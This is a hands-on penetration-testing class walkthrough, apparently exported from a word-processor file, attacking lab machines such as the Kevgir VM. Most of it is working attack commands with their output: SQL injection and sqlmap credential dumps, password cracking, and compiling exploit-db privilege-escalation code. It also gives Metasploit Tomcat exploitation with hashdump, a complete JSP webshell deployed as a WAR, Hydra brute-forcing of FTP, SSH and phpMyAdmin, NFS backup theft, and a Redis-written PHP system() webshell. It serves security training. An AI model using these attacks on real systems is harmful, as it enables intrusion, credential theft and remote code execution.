1,version(),3,4,5,6,7,8,9<text:line-break/> <text:line-break/>http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Tried to run sqlmap against the target<text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>cd sqlmap-dev/<text:line-break/>python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user" -b --dbms=mysql<text:line-break/> <text:line-break/>python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user" --current-user --dbms=mysql<text:line-break/> <text:line-break/>python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user" --current-db --dbms=mysql<text:line-break/> <text:line-break/>python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user" --dbs --dbms=mysql<text:line-break/> <text:line-break/>python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user" --users --passwords --dbms=mysql<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)<text:line-break/>FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user" -D jabcd0cs --tables --dbms=mysql<text:line-break/> <text:line-break/>python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/><text:s text:c="4"/>username:<text:s text:c="3"/>webmin<text:line-break/><text:s text:c="4"/>hash:<text:s text:c="7"/>b78aae356709f8c31118ea613980954b<text:line-break/> <text:line-break/>https://hashkiller.co.uk/md5-decrypter.aspx<text:line-break/><text:s text:c="3"/><text:line-break/><text:s text:c="4"/>hash:<text:s text:c="7"/>b78aae356709f8c31118ea613980954b<text:line-break/><text:s text:c="4"/>pass:<text:s text:c="7"/>webmin1980<text:line-break/> <text:line-break/> <text:line-break/>ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>ssh -l webmin 172.31.2.64<text:line-break/><text:s text:c="4"/>webmin1980<text:line-break/> <text:line-break/>id<text:line-break/> <text:line-break/>cat /etc/*release<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>....tired of not having a real command shell...<text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>python -c 'import pty;pty.spawn("/bin/bash")'<text:line-break/> <text:line-break/> <text:line-break/>cd /tmp<text:line-break/> <text:line-break/>pwd<text:line-break/> <text:line-break/> <text:line-break/>cat &gt;&gt; exploit.c &lt;&lt; out<text:line-break/> <text:line-break/>**************paste in the content from here *****************<text:line-break/>https://www.exploit-db.com/raw/39166/<text:line-break/> <text:line-break/> <text:line-break/>------ hit enter a few times ------<text:line-break/> <text:line-break/>------ then type 'out' ----- this closes the file handle...<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>gcc -o boom exploit.c<text:line-break/> <text:line-break/>./boom<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>------------exploit failed, damn let's try another one ---------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>cat &gt;&gt; exploit2.c &lt;&lt; out<text:line-break/> <text:line-break/>**************paste in the content from here *****************<text:line-break/>https://www.exploit-db.com/raw/37292/<text:line-break/> <text:line-break/> <text:line-break/>out<text:line-break/> <text:line-break/> <text:line-break/>gcc -o boom2 exploit2.c<text:line-break/> <text:line-break/>./boom2<text:line-break/> <text:line-break/>id<text:line-break/> <text:line-break/> <text:line-break/>......YEAH - do the happy dance!!!!<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>---- Previous class attack process -------<text:line-break/> <text:line-break/> <text:line-break/>#########################<text:line-break/># Building a quick list #<text:line-break/>#########################<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>cd ~<text:line-break/>echo bob &gt;&gt; list.txt<text:line-break/>echo jim &gt;&gt; list.txt<text:line-break/>echo joe &gt;&gt; list.txt<text:line-break/>echo tim &gt;&gt; list.txt<text:line-break/>echo admin &gt;&gt; list.txt<text:line-break/>echo hello &gt;&gt; list.txt<text:line-break/>echo rob &gt;&gt; list.txt<text:line-break/>echo test &gt;&gt; list.txt<text:line-break/>echo aaaaaa &gt;&gt; list.txt<text:line-break/>echo larry &gt;&gt; list.txt<text:line-break/>echo mario &gt;&gt; list.txt<text:line-break/>echo jason &gt;&gt; list.txt<text:line-break/>echo john &gt;&gt; list.txt<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>###########################################################<text:line-break/># Let's start with some basic scanning of the lab network #<text:line-break/>###########################################################<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>infosecaddicts@ubuntu:~$ nmap -sP 172.31.2.0/24<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:17 EST<text:line-break/>Nmap scan report for 172.31.2.24<text:line-break/>Host is up (0.046s latency).<text:line-break/>Nmap scan report for 172.31.2.47<text:line-break/>Host is up (0.045s latency).<text:line-break/>Nmap scan report for 172.31.2.64<text:line-break/>Host is up (0.037s latency).<text:line-break/>Nmap scan report for 172.31.2.86<text:line-break/>Host is up (0.040s latency).<text:line-break/>Nmap scan report for 172.31.2.117<text:line-break/>Host is up (0.038s latency).<text:line-break/>Nmap scan report for 172.31.2.139<text:line-break/>Host is up (0.037s latency).<text:line-break/>Nmap scan report for 172.31.2.157<text:line-break/>Host is up (0.036s latency).<text:line-break/>Nmap scan report for 172.31.2.217<text:line-break/>Host is up (0.047s latency).<text:line-break/>Nmap scan report for 172.31.2.238<text:line-break/>Host is up (0.036s latency).<text:line-break/>Nmap done: 256 IP addresses (9 hosts up) scanned in 3.22 seconds<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>infosecaddicts@ubuntu:~$ sudo nmap -sS 172.31.2.24<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>[sudo] password for infosecaddicts:<text:line-break/> <text:line-break/>Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:18 EST<text:line-break/>Nmap scan report for 172.31.2.24<text:line-break/>Host is up (1.8s latency).<text:line-break/>Not shown: 989 closed ports<text:line-break/>PORT<text:s text:c="5"/>STATE<text:s text:c="4"/>SERVICE<text:line-break/>25/tcp<text:s text:c="3"/>open<text:s text:c="5"/>smtp<text:line-break/>80/tcp<text:s text:c="3"/>open<text:s text:c="5"/>http<text:line-break/>111/tcp<text:s text:c="2"/>open<text:s text:c="5"/>rpcbind<text:line-break/>139/tcp<text:s text:c="2"/>open<text:s text:c="5"/>netbios-ssn<text:line-break/>445/tcp<text:s text:c="2"/>open<text:s text:c="5"/>microsoft-ds<text:line-break/>514/tcp<text:s text:c="2"/>filtered shell<text:line-break/>1322/tcp open<text:s text:c="5"/>novation<text:line-break/>2049/tcp open<text:s text:c="5"/>nfs<text:line-break/>8080/tcp open<text:s text:c="5"/>http-proxy<text:line-break/>8081/tcp open<text:s text:c="5"/>blackice-icecap<text:line-break/>9000/tcp open<text:s text:c="5"/>cslistener<text:line-break/> <text:line-break/>Nmap done: 1 IP address (1 host up) scanned in 133.56 seconds<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>infosecaddicts@ubuntu:~$ sudo nmap -sV -p25,80,111,139,445,1322,2049,8080,8081,9000 172.31.2.24<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:21 EST<text:line-break/>Nmap scan report for 172.31.2.24<text:line-break/>Host is up (0.031s latency).<text:line-break/>PORT<text:s text:c="5"/>STATE SERVICE<text:s text:c="5"/>VERSION<text:line-break/>25/tcp<text:s text:c="3"/>open<text:s text:c="2"/>ftp<text:s text:c="9"/>vsftpd 3.0.2<text:line-break/>80/tcp<text:s text:c="3"/>open<text:s text:c="2"/>http<text:s text:c="8"/>Apache httpd 2.4.7 ((Ubuntu))<text:line-break/>111/tcp<text:s text:c="2"/>open<text:s text:c="2"/>rpcbind<text:s text:c="5"/>2-4 (RPC #100000)<text:line-break/>139/tcp<text:s text:c="2"/>open<text:s text:c="2"/>netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)<text:line-break/>445/tcp<text:s text:c="2"/>open<text:s text:c="2"/>netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)<text:line-break/>1322/tcp open<text:s text:c="2"/>ssh<text:s text:c="9"/>OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)<text:line-break/>2049/tcp open<text:s text:c="2"/>nfs_acl<text:s text:c="5"/>2-3 (RPC #100227)<text:line-break/>8080/tcp open<text:s text:c="2"/>http<text:s text:c="8"/>Apache Tomcat/Coyote JSP engine 1.1<text:line-break/>8081/tcp open<text:s text:c="2"/>http<text:s text:c="8"/>Apache httpd 2.4.7 ((Ubuntu))<text:line-break/>9000/tcp open<text:s text:c="2"/>http<text:s text:c="8"/>Jetty winstone-2.9<text:line-break/>Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel<text:line-break/> <text:line-break/>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .<text:line-break/>Nmap done: 1 IP address (1 host up) scanned in 15.15 seconds<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>###########################<text:line-break/># Day 1: Attacking Kevgir #<text:line-break/>###########################<text:line-break/> <text:line-break/> <text:line-break/>******** Attacking Kevgir ********<text:line-break/>I figured I've give you something fun to play with.<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>###############<text:line-break/># Using Nikto #<text:line-break/>###############<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> 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24<text:line-break/> <text:line-break/>perl nikto.pl -h 172.31.2.24:8080<text:line-break/> <text:line-break/>perl nikto.pl -h 172.31.2.24:8081<text:line-break/> <text:line-break/>perl nikto.pl -h 172.31.2.24:9000<text:line-break/> <text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>####################<text:line-break/># Using Metasploit #<text:line-break/>####################<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>cd ~/toolz/metasploit<text:line-break/> <text:line-break/>./msfconsole<text:line-break/> <text:line-break/>use auxiliary/scanner/http/http_version<text:s text:c="8"/><text:line-break/> <text:line-break/>set RHOSTS 172.31.2.24<text:line-break/> <text:line-break/>set RPORT 8080<text:line-break/> <text:line-break/>run<text:line-break/> <text:line-break/> <text:line-break/>-------------------------------<text:line-break/> <text:line-break/>use auxiliary/scanner/http/tomcat_enum<text:s text:c="10"/><text:line-break/> <text:line-break/>set RHOSTS 172.31.2.24<text:line-break/> <text:line-break/>set RPORT 8080<text:line-break/> <text:line-break/>run<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>####################<text:line-break/># Attacking Tomcat #<text:line-break/>####################<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>use auxiliary/scanner/http/http_version<text:s text:c="8"/><text:line-break/> <text:line-break/>set RHOSTS 172.31.2.24<text:line-break/> <text:line-break/>set RPORT 8080<text:line-break/> <text:line-break/>run<text:line-break/> <text:line-break/> <text:line-break/>-------------------------------<text:line-break/> <text:line-break/> <text:line-break/>use auxiliary/scanner/http/tomcat_mgr_login<text:s text:c="10"/><text:line-break/> <text:line-break/>set USERNAME tomcat<text:line-break/> <text:line-break/>set USERPASS_FILE /home/infosecaddicts/list.txt<text:line-break/> <text:line-break/>set STOP_ON_SUCCESS true<text:line-break/> <text:line-break/>set RHOSTS 172.31.2.24<text:line-break/> <text:line-break/>set RPORT 8080<text:line-break/> <text:line-break/>run<text:line-break/> <text:line-break/> <text:line-break/>-------------------------------<text:line-break/> <text:line-break/>use exploit/multi/http/tomcat_mgr_upload<text:line-break/> <text:line-break/>set HttpUsername tomcat<text:line-break/> <text:line-break/>set HttpPassword tomcat<text:line-break/> <text:line-break/>set RHOST 172.31.2.24<text:line-break/> <text:line-break/>set RPORT 8080<text:line-break/> <text:line-break/>set PATH /manager/html<text:line-break/> <text:line-break/>set PAYLOAD java/meterpreter/bind_tcp<text:line-break/> <text:line-break/>exploit<text:line-break/> <text:line-break/> <text:line-break/>run post/linux/gather/checkvm<text:line-break/> <text:line-break/>run post/linux/gather/enum_configs<text:line-break/> <text:line-break/>run post/linux/gather/enum_protections<text:line-break/> <text:line-break/>run post/linux/gather/enum_system<text:line-break/> <text:line-break/>run post/linux/gather/enum_users_history<text:line-break/> <text:line-break/>run post/linux/gather/hashdump<text:line-break/> <text:line-break/>shell<text:line-break/> <text:line-break/>/bin/bash<text:line-break/> <text:line-break/>id<text:line-break/> <text:line-break/>uname -a<text:line-break/> <text:line-break/>dpkg -l<text:line-break/> <text:line-break/>cd /tmp<text:line-break/> <text:line-break/>pwd<text:line-break/> <text:line-break/> <text:line-break/>cat &gt;&gt; exploit.c &lt;&lt; out<text:line-break/> <text:line-break/>**************paste in the content from here *****************<text:line-break/>https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c<text:line-break/> <text:line-break/> <text:line-break/>------ hit enter a few times ------<text:line-break/> <text:line-break/>------ then type 'out' ----- this closes the file handle...<text:line-break/> <text:line-break/> <text:line-break/>gcc -o boom exploit.c<text:line-break/> <text:line-break/>./boom<text:line-break/> <text:line-break/>id<text:line-break/> <text:line-break/> <text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 172.31.2.24 http-get /manager/html<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>-------------------------------------------index.jsp-------------------------------------------<text:line-break/>&lt;FORM METHOD=GET ACTION='index.jsp'&gt;<text:line-break/>&lt;INPUT name='cmd' type=text&gt;<text:line-break/>&lt;INPUT type=submit value='Run'&gt;<text:line-break/>&lt;/FORM&gt;<text:line-break/>&lt;%@ page import="java.io.*" %&gt;<text:line-break/>&lt;%<text:line-break/><text:s text:c="3"/>String cmd = request.getParameter("cmd");<text:line-break/><text:s text:c="3"/>String output = "";<text:line-break/><text:s text:c="3"/>if(cmd != null) {<text:line-break/><text:s text:c="6"/>String s = null;<text:line-break/><text:s text:c="6"/>try {<text:line-break/><text:s text:c="9"/>Process p = Runtime.getRuntime().exec(cmd,null,null);<text:line-break/><text:s text:c="9"/>BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));<text:line-break/><text:s text:c="9"/>while((s = sI.readLine()) != null) { output += s+"&lt;/br&gt;"; }<text:line-break/><text:s text:c="6"/>}<text:s text:c="2"/>catch(IOException e) {<text:s text:c="3"/>e.printStackTrace();<text:s text:c="3"/>}<text:line-break/><text:s text:c="3"/>}<text:line-break/>%&gt;<text:line-break/>&lt;pre&gt;&lt;%=output %&gt;&lt;/pre&gt;<text:line-break/>-------------------------------------------index.jsp-------------------------------------------<text:line-break/> <text:line-break/>***** now pack the webshell *****<text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>mkdir webshell<text:line-break/>cp index.jsp webshell<text:line-break/> <text:line-break/>cd webshell<text:line-break/>jar -cvf ../webshell.war *<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>Deploy the WAR file using the built-in deploy option on the manager web-page.<text:line-break/>Once the WAR file is deployed I simply browse to the URL I deployed the WAR file<text:line-break/>now upload the webshell.war. After uploading, visit page: http://172.31.2.2:8080/webshell/<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>****** This section isn't finished ******<text:line-break/> <text:line-break/> ---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>cd ~/toolz/metasploit<text:line-break/> <text:line-break/>./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war &gt; /home/infosecaddicts/bind7777.war<text:line-break/> <text:line-break/>jar tf ~/bind7777.war<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>****** This section isn't finished ******<text:line-break/> <text:line-break/>Google is your friend hahahahahahahah........<text:line-break/> <text:line-break/> <text:line-break/>#################<text:line-break/># Attacking FTP #<text:line-break/>#################<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.24<text:line-break/> <text:line-break/>cd ~/toolz/hydra<text:line-break/> <text:line-break/>hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 172.31.2.24 ftp<text:line-break/> <text:line-break/>ftp<text:line-break/>open 172.31.2.24<text:line-break/>admin<text:line-break/>admin<text:line-break/>pwd<text:line-break/>ls -lah<text:line-break/> <text:line-break/>ls ../../<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>#################<text:line-break/># Attacking SSH #<text:line-break/>#################<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>sudo apt-get install -y libssh-dev<text:line-break/><text:s text:c="5"/>infosecaddicts<text:line-break/>cd ~/toolz/hydra<text:line-break/>make clean<text:line-break/>./configure<text:line-break/>make<text:line-break/>sudo make install<text:line-break/> <text:line-break/> <text:line-break/>hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 172.31.2.24 ssh<text:line-break/> <text:line-break/>ssh -p 1322 admin@172.31.2.24<text:line-break/> <text:line-break/> <text:line-break/>-------------------------------<text:line-break/> <text:line-break/>cd ~/toolz/metasploit<text:line-break/> <text:line-break/>./msfconsole<text:line-break/> <text:line-break/>use auxiliary/scanner/ssh/ssh_enumusers<text:s text:c="10"/><text:line-break/> <text:line-break/>set USER_FILE /home/infosecaddicts/list.txt<text:line-break/> <text:line-break/>set STOP_ON_SUCCESS true<text:line-break/> <text:line-break/>set RHOSTS 172.31.2.24<text:line-break/> <text:line-break/>set RPORT 1322<text:line-break/> <text:line-break/>run<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>use auxiliary/scanner/ssh/ssh_login<text:s text:c="10"/><text:line-break/> <text:line-break/>set USER_FILE /home/infosecaddicts/list.txt<text:line-break/> <text:line-break/>set PASS_FILE /home/infosecaddicts/list.txt<text:line-break/> <text:line-break/>set STOP_ON_SUCCESS true<text:line-break/> <text:line-break/>set RHOSTS 172.31.2.24<text:line-break/> <text:line-break/>set RPORT 1322<text:line-break/> <text:line-break/>run<text:line-break/> <text:line-break/> <text:line-break/>sessions -l<text:line-break/> <text:line-break/>sessions -u 1<text:line-break/> <text:line-break/>sessions -i 1<text:line-break/> <text:line-break/>id<text:line-break/> <text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>########################<text:line-break/># Attacking phpMyAdmin #<text:line-break/>########################<text:line-break/>****** This section isn't finished ******<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>hydra -l root -P /home/infosecaddicts/list.txt -e n http-post-form://172.31.2.24 -m "/phpMyAdmin/index.php:pma_username=^USER^&amp;pma_password=^PASS^&amp;server=1:S=information_schema"<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>****** This section isn't finished ******<text:line-break/> <text:line-break/>Google is your friend hahahahahahahah........<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py<text:line-break/> <text:line-break/>python pmabf.py http://172.31.2.24 root list.txt<text:s text:c="8"/>(this gave me the WRONG password)<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>####################<text:line-break/># Attacking Joomla #<text:line-break/>####################<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>cd ~/toolz/metasploit<text:line-break/> <text:line-break/>./msfconsole<text:line-break/> <text:line-break/>use use auxiliary/scanner/http/joomla_plugins<text:s text:c="12"/><text:line-break/> <text:line-break/>set RHOSTS 172.31.2.24<text:line-break/> <text:line-break/>set RPORT 8080<text:line-break/> <text:line-break/>run<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>****** This section isn't finished ******<text:line-break/>Google is your friend hahahahahahahah........<text:line-break/> <text:line-break/>#####################<text:line-break/># Attacking Jenkins #<text:line-break/>#####################<text:line-break/> <text:line-break/> <text:line-break/>****** This section isn't finished ******<text:line-break/>Google is your friend hahahahahahahah........<text:line-break/> <text:line-break/>#################<text:line-break/># Attacking NFS #<text:line-break/>#################<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>sudo apt install -y rpcbind nfs-common<text:line-break/> <text:line-break/>rpcinfo -s 172.31.2.24<text:line-break/> <text:line-break/>showmount -e 172.31.2.24<text:line-break/> <text:line-break/>sudo /bin/bash<text:line-break/> <text:line-break/>mkdir /tmp/nfs<text:line-break/> <text:line-break/>mount -t nfs 172.31.2.24:/backup /tmp/nfs -o nolock<text:line-break/> <text:line-break/>ls /tmp/nfs<text:line-break/> <text:line-break/>cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts<text:line-break/> <text:line-break/>umount -l /tmp/nfs<text:line-break/> <text:line-break/>exit<text:line-break/> <text:line-break/>sudo apt-cache search fcrackzip<text:line-break/> <text:line-break/>sudo apt-get install -y fcrackzip<text:line-break/> <text:line-break/>fcrackzip -u backup.tar.bz2.zip<text:line-break/> <text:line-break/>unzip -P aaaaaa backup.tar.bz2.zip<text:line-break/> <text:line-break/>tar jxf backup.tar.bz2<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>###################<text:line-break/># Attacking Redis #<text:line-break/>###################<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>sudo nmap -p 6379 --script=redis-info 172.31.2.24<text:line-break/><text:s text:c="4"/>infosecaddicts<text:line-break/> <text:line-break/>sudo apt-get install -y redis-tools<text:line-break/><text:s text:c="4"/>infosecaddicts<text:line-break/> <text:line-break/>redis-cli -h 172.31.2.24<text:line-break/> <text:line-break/>CONFIG SET dir /var/www/html/main<text:line-break/> <text:line-break/>CONFIG GET dir<text:line-break/> <text:line-break/>config set dbfilename boom.php<text:line-break/> <text:line-break/>CONFIG GET dbfilename<text:line-break/> <text:line-break/>SET cmd "&lt;?php system($_GET['joe']); ?&gt;"<text:line-break/> <text:line-break/>BGSAVE<text:line-break/> <text:line-break/>http://172.31.2.24/boom.php<text:line-break/> <text:line-break/>http://172.31.2.24/boom.php?joe=id<text:line-break/> <text:line-break/> <text:line-break/>(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") &gt; foo.txt/.ssh"<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>****** This section isn't finished ******<text:line-break/>Google is your friend hahahahahahahah........<text:line-break/> <text:line-break/>cd ~/toolz/metasploit<text:line-break/> <text:line-break/>./msfconsole<text:line-break/> <text:line-break/>use auxiliary/scanner/redis/file_upload<text:line-break/> <text:line-break/>set RHOSTS 172.31.2.24<text:line-break/> <text:line-break/>set LocalFile<text:line-break/> <text:line-break/>****** This section isn't finished ******<text:line-break/>Google is your friend hahahahahahahah........<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>sudo nmap -sV -p 3260 172.31.2.217<text:line-break/> <text:line-break/> <text:line-break/>sudo apt install open-iscsi<text:line-break/> <text:line-break/>sudo iscsiadm -m discovery -t<text:s text:c="2"/>st -p 172.31.2.217<text:line-break/> <text:line-break/>sudo iscsiadm -m discovery -t<text:s text:c="2"/>st -p 172.31.2.217:3260<text:line-break/> <text:line-break/>sudo iscsiadm -m node -p 172.31.2.217 --login<text:line-break/> <text:line-break/>sudo /bin/bash<text:line-break/> <text:line-break/>fdisk -l<text:line-break/><text:s text:c="4"/>***** look for /dev/sda5 - Linux swap / Solaris *******<text:line-break/> <text:line-break/>mkdir /mnt/217vm<text:line-break/> <text:line-break/>mount /dev/sdb /mnt/217vm<text:line-break/> <text:line-break/>cd /mnt/217vm<text:line-break/> <text:line-break/>ls<text:line-break/> <text:line-break/>cat flag1.txt<text:line-break/> <text:line-break/>file bobsdisk.dsk<text:line-break/> <text:line-break/>mkdir /media/bobsdisk<text:line-break/> <text:line-break/>mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk<text:line-break/> <text:line-break/>/mnt/217vm# ls<text:line-break/> <text:line-break/>cd /media/bobsdisk/<text:line-break/> <text:line-break/>ls<text:line-break/> <text:line-break/>cat ToAlice.eml<text:line-break/> <text:line-break/>file bobsdisk.dsk<text:line-break/> <text:line-break/>mkdir /media/bobsdisk<text:line-break/> <text:line-break/>mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk<text:line-break/> <text:line-break/>/mnt/217vm# ls<text:line-break/> <text:line-break/>cd /media/bobsdisk/<text:line-break/> <text:line-break/>ls<text:line-break/> <text:line-break/>cat ToAlice.eml<text:line-break/> <text:line-break/>file ToAlice.csv.enc<text:line-break/> <text:line-break/>file bobsdisk.dsk<text:line-break/> <text:line-break/>pwd<text:line-break/> <text:line-break/>mkdir /media/bobsdisk<text:line-break/> <text:line-break/> <text:line-break/>mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk<text:line-break/> <text:line-break/>ls<text:line-break/> <text:line-break/>cd /media/bobsdisk/<text:line-break/> <text:line-break/>ls<text:line-break/> <text:line-break/>openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv<text:line-break/> <text:line-break/>ls<text:line-break/> <text:line-break/>cat ToAlice.eml | grep flag<text:line-break/> <text:line-break/>openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv<text:line-break/> <text:line-break/>ls<text:line-break/> <text:line-break/>cat ToAlice.eml<text:line-break/><text:s text:c="4"/>***** look for supercalifragilisticoespialidoso ******<text:line-break/> <text:line-break/>openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv<text:line-break/> <text:line-break/><text:s text:c="4"/>supercalifragilisticoespialidoso<text:line-break/> <text:line-break/> <text:line-break/>ls<text:line-break/> <text:line-break/>cat ToAlice.csv<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>-----------------------------------------------------<text:line-break/>Web Path,Reason<text:line-break/>5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!<text:line-break/>c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.<text:line-break/>flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?<text:line-break/> <text:line-break/>-----------------------------------------------------<text:line-break/> <text:line-break/>The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:<text:line-break/>http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/<text:line-break/><text:s text:c="2"/>-- view source<text:line-break/> <text:line-break/>Found this string in the 